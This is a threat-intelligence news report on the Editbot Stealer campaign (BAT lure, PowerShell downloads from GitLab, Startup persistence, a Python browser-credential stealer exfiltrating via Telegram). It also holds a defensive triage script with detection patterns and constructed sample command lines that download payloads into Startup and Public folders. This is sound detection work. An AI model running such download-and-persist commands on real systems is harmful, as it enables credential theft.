A new malicious campaign, Editbot Stealer, was discovered in which threat actors use WinRAR archive files with minimal detection to perform a multi-stage attack. Threat actors have been utilizing the theme of “defective product to be sent back” to lure users to their deceptive websites.
The malicious WinRAR archive used by the threat actors contains a .bat file and a JSON file for the initial stage of the attack, followed by several PowerShell commands for the later stages. The malicious files were distributed through social media.
Editbot Stealer in Action
Initial Access & Persistence
According to the reports shared with Cyber Security News, the BAT file used in the initial stage of the attack goes by the name “Screenshot Product Photo Sample.bat” and contains multiple PowerShell commands for downloading and executing additional payloads.
The first PowerShell command inside the BAT file downloads another BAT file from GitLab and saves it under the name “WindowsSecure.bat” in the startup folder for persistent execution. This BAT file is used to regularly execute the Python stealer, which is downloaded in a later stage of the attack.
The second PowerShell command retrieves a ZIP file named “Document.zip” from the same GitLab repository and saves it in the C:\Users\Public directory. The third PowerShell command extracts this ZIP file into the C:\Users\Public\Documents directory, which then contains the Python stealer “libb1.py”.
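The three-stage chain above (PowerShell download into the Startup folder, a second download into C:\Users\Public, and the Python stealer launched from C:\Users\Public\Documents) can be hunted for in process-creation telemetry. The triage helper below is an added example, not code from the report or the campaign; it assumes Sysmon-style field names (Image, ParentImage, CommandLine), assumed directory layouts, and a placeholder GitLab path, since the report does not name the repository.

```python
import re

# Behaviours the report describes. Directory layouts and field names are assumptions.
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
PUBLIC_DIR = re.compile(r"C:\\Users\\Public\\", re.I)
DOWNLOAD_CMDLET = re.compile(r"Invoke-WebRequest|\biwr\b|DownloadFile|Start-BitsTransfer", re.I)
PUBLIC_PY = re.compile(r"C:\\Users\\Public\\Documents\\[^\s\"']*\.py", re.I)


def triage(records):
    """Return (stage, reason, command_line) for each record matching a stage of the chain."""
    findings = []
    for rec in records:
        image = rec.get("Image", "").lower()
        parent = rec.get("ParentImage", "").lower()
        cmd = rec.get("CommandLine", "")
        # Persistence: a .bat launched out of a Startup folder (WindowsSecure.bat).
        if image.endswith("\\cmd.exe") and STARTUP_DIR.search(cmd) and ".bat" in cmd.lower():
            findings.append(("persistence", "batch file run from Startup folder", cmd))
        # Staging: cmd.exe-spawned PowerShell downloading into Startup or C:\Users\Public.
        elif (image.endswith("\\powershell.exe") and parent.endswith("\\cmd.exe")
              and DOWNLOAD_CMDLET.search(cmd)
              and (STARTUP_DIR.search(cmd) or PUBLIC_DIR.search(cmd))):
            findings.append(("download", "PowerShell download into Startup or Public", cmd))
        # Stealer: a Python script executed from C:\Users\Public\Documents (libb1.py).
        elif image.endswith(("\\python.exe", "\\pythonw.exe")) and PUBLIC_PY.search(cmd):
            findings.append(("stealer", "Python script run from Public\\Documents", cmd))
    return findings


# Constructed Sysmon Event ID 1 style records (not real telemetry); the GitLab
# path is a placeholder because the report does not name the repository.
STARTUP = r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_RECORDS = [
    {"Image": PS, "ParentImage": CMD, "CommandLine": "powershell -c Invoke-WebRequest "
     "https://gitlab.com/PLACEHOLDER/WindowsSecure.bat -OutFile '" + STARTUP + r"\WindowsSecure.bat'"},
    {"Image": PS, "ParentImage": CMD, "CommandLine": "powershell -c Invoke-WebRequest "
     r"https://gitlab.com/PLACEHOLDER/Document.zip -OutFile C:\Users\Public\Document.zip"},
    {"Image": CMD, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c '" + STARTUP + r"\WindowsSecure.bat'"},
    {"Image": r"C:\Python311\python.exe", "ParentImage": CMD,
     "CommandLine": r"python.exe C:\Users\Public\Documents\libb1.py"},
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell -c Get-Process"},
]
```

Running `triage(SAMPLE_RECORDS)` flags the two downloads, the Startup-folder persistence and the stealer launch, and leaves the benign PowerShell record alone; in a real deployment the Startup, Public and cmdlet patterns should be tuned against the environment's own baseline.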
Working of the Python Stealer – Editbot
The Python stealer performs several functions, including extracting the victim's country code, IP address, and timestamp, alongside credential-stealing routines that target several browsers.
This stealer extracts multiple pieces of information, such as cookies, login data, web data, and local state, from the browser profile folder and stores them inside the %temp% folder. All of the stolen information is written to a text file named “pass.txt”.
After collecting all the information from the victim, the stealer creates a ZIP archive of the extracted data and stores it inside the same %temp% directory. To exfiltrate this information, the threat actors have set up Telegram bots.
Furthermore, a complete report about the Editbot stealer has been published, which provides detailed information on the source code, extraction method, and other information.